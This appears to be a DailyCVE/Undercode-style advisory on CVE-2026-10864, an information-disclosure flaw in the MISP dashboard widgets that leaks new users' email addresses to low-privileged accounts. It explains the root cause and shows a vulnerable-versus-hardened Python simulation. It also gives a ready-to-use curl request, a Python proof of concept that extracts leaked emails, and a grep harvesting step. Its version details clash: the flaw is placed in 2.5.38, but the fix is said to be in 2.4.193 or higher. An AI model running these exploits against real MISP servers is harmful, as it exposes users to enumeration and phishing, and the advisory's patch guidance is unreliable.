Technical Deep Dive: How CVE-2026-10864 Works
CVE-2026-10864 is an information disclosure vulnerability present in the MISP (Malware Information Sharing Platform) dashboard, specifically within the “New Users” and “New Organisations” widgets. The core of the issue lies in how the application handles user-supplied `fields` parameters when fetching data for these widgets.
An authenticated attacker with low privileges can manipulate the `fields` option in the API request to the dashboard. The vulnerability occurs because the system applies field filtering and redaction (removing restricted fields like email addresses) after it has parsed the user’s request. If a non-site-admin user requests a set of fields that, after the system applies its security redaction, results in an empty field list, the underlying database query enters a fallback state.
In this fallback state, instead of returning nothing or an error, the MISP backend incorrectly defaults to returning a set of unintended model fields from the database. For the “New Users” widget, this fallback can leak the `email` field of newly created user accounts, even if the global configuration setting `MISP.email_disabled` is turned on to prevent such disclosure. Similarly, the “New Organisations” widget can be manipulated to leak sensitive internal organisation metadata that should not be visible to a low-privileged user.
The root cause is a classic case of flawed input validation and an insecure state transition (CWE-20). The developers applied security measures like redaction post-validation, which creates a scenario where a “valid” user input becomes “invalid” after processing, leading to an unhandled logic path. The fix implements a safe construction of the allowed field list, ensures restricted fields are stripped before processing user input, and explicitly defines a safe fallback to only permitted default fields when a request results in an empty selection.
The vulnerability is exploitable over the network (AV:N) with low attack complexity (AC:L) and requires low-privileged user authentication (PR:L). It has a CVSS v4 base score of 5.3 (MEDIUM).
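The flawed and hardened field-selection logic described above, as an added illustration in Python (not MISP's own code; MISP is written in PHP). The model columns, the sample user rows, the restricted-field set, the safe default list and the function names are assumptions made for this example; the point it shows is the order of operations: parsing and redacting first and then handing an empty list to the data layer triggers the "select everything" fallback, while building the allowed list up front and defining an explicit permitted fallback does not.

```python
# Constructed stand-ins for the User model; the real MISP columns differ (assumption).
MODEL_COLUMNS = ("id", "org_id", "email", "date_created", "role_id")
# Fields a non-site-admin may never receive through the widget (assumption).
RESTRICTED_FIELDS = frozenset({"email"})
# Permitted defaults the hardened path falls back to (assumption).
SAFE_DEFAULT_FIELDS = ("id", "org_id", "date_created")

# Constructed sample rows standing in for newly created accounts.
SAMPLE_USERS = [
    {"id": 7, "org_id": 1, "email": "alice@example.test", "date_created": "2026-06-01", "role_id": 3},
    {"id": 8, "org_id": 2, "email": "bob@example.test", "date_created": "2026-06-02", "role_id": 3},
]


def orm_find(fields):
    """Stand-in for the ORM call. An empty field list means 'select every column',
    which is the fallback state the advisory describes."""
    selected = tuple(fields) if fields else MODEL_COLUMNS
    return [{col: row[col] for col in selected} for row in SAMPLE_USERS]


def restricted_for(is_site_admin, email_disabled):
    """Fields that must be stripped for this caller. Assumption: email is hidden from
    non-site-admins and, when the email_disabled setting is on, from every caller."""
    if is_site_admin and not email_disabled:
        return frozenset()
    return RESTRICTED_FIELDS


def vulnerable_get_data(requested, is_site_admin, email_disabled=False):
    """Flawed order of operations: validate the user's list first, redact afterwards,
    and pass whatever remains to the ORM with no guard for the empty case."""
    fields = [f for f in requested if f in MODEL_COLUMNS]   # 1. parse the request
    redacted = restricted_for(is_site_admin, email_disabled)
    fields = [f for f in fields if f not in redacted]       # 2. redact after parsing
    return orm_find(fields)                                 # 3. [] -> every column


def hardened_get_data(requested, is_site_admin, email_disabled=False):
    """Fix pattern from the advisory: build the allowed list first, filter the request
    against it, and fall back only to permitted defaults when nothing is left."""
    allowed = set(MODEL_COLUMNS) - restricted_for(is_site_admin, email_disabled)
    fields = [f for f in requested if f in allowed]
    if not fields:
        fields = [f for f in SAFE_DEFAULT_FIELDS if f in allowed]
    return orm_find(fields)


def leaked_fields(rows, is_site_admin, email_disabled=False):
    """Restricted fields present in a response for this caller; empty means no disclosure."""
    redacted = restricted_for(is_site_admin, email_disabled)
    return {col for row in rows for col in row if col in redacted}


if __name__ == "__main__":
    # Compare both code paths for a low-privileged caller on three request shapes.
    for req in (["email"], ["non_existent_field"], ["id"]):
        vuln = leaked_fields(vulnerable_get_data(req, is_site_admin=False), False)
        safe = leaked_fields(hardened_get_data(req, is_site_admin=False), False)
        print(f"request={req!r:<25} vulnerable leaks={sorted(vuln)} hardened leaks={sorted(safe)}")
```

Running the block prints one line per request shape: for `["email"]` and for a non-existent field the vulnerable path leaks `email` while the hardened path leaks nothing; for a legitimately allowed field such as `id` neither path leaks, which is why the bug only surfaces when the post-redaction list is empty.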
DailyCVE Form:
Platform: MISP
Version: 2.5.38
Vulnerability: Info Disclosure
Severity: Medium
Date: 2026-06-04
Prediction: 2026-06-18
What Undercode Say:
Undercode recommends the following commands to check for vulnerable MISP versions and to test for the vulnerability.
1. Check MISP Version:
Log into the MISP server and run: cat /var/www/MISP/app/Config/version.php | grep -E "version|release"
2. Test Vulnerability via cURL:
This command sends a crafted request to the `dashboard/widgets` endpoint, manipulating the `fields` parameter to attempt to leak email addresses.
curl -X GET 'https://<MISP-URL>/dashboard/widgets/NewUsersWidget/getData' \
-H 'Authorization: Bearer <YOUR_API_KEY>' \
-H 'Content-Type: application/json' \
-d '{"params":{"fields":["restricted_field_that_gets_redacted","another_fake_field"]}}'
3. Python Proof-of-Concept (PoC) Script:
import json
import re
import requests

url = "https://<MISP-URL>/dashboard/widgets/NewUsersWidget/getData"
headers = {"Authorization": "Bearer <YOUR_API_KEY>", "Content-Type": "application/json"}
# Request a field that will be redacted, forcing an empty selection
payload = {"params": {"fields": ["non_existent_field"]}}
response = requests.get(url, headers=headers, json=payload)
if response.status_code == 200:
    # If email addresses are in the response, the system is vulnerable
    if "email" in response.text:
        print("[!] VULNERABLE: Email addresses leaked.")
        # Pull the email values out of the JSON body (replaces the shell grep)
        emails = re.findall(r'"email":\s*"([^"]+)"', json.dumps(response.json()))
        print("\n".join(emails))
    else:
        print("[+] No email field in the response.")
4. Grep for Leaked Emails:
After a successful exploit, filter the output for email patterns.
curl -s ... | grep -oE '([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})'
Exploit:
An attacker must have a valid low-privileged MISP user account. They then access the dashboard and intercept the request to either the `NewUsersWidget` or `NewOrganisationsWidget`. The attacker modifies the `fields` parameter in the JSON payload to include a non-existent or redacted field (e.g., `email`). When the MISP backend redacts all requested fields as invalid, it triggers the vulnerable fallback, which returns the default model fields, including the sensitive `email` column for the user widget. The attacker can then extract these emails from the API response.
Protection:
Immediate Action: Upgrade MISP to a patched version (2.4.193 or higher, as per the advisory for related issues, or the specific version containing the fix for this CVE).
Mitigation: If an immediate upgrade is not possible, disable the “New Users” and “New Organisations” dashboard widgets for all non-admin users via the MISP role/permissions settings.
Network Segmentation: Restrict access to the MISP dashboard API endpoints to trusted IP addresses only.
Impact:
An authenticated, low-privileged user (e.g., an analyst) can view the email addresses of all newly created users and potentially other sensitive internal organisation metadata. This violates the principle of least privilege and can be used for further social engineering attacks, account enumeration, or as a stepping stone for more complex attacks on the MISP instance or its users.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

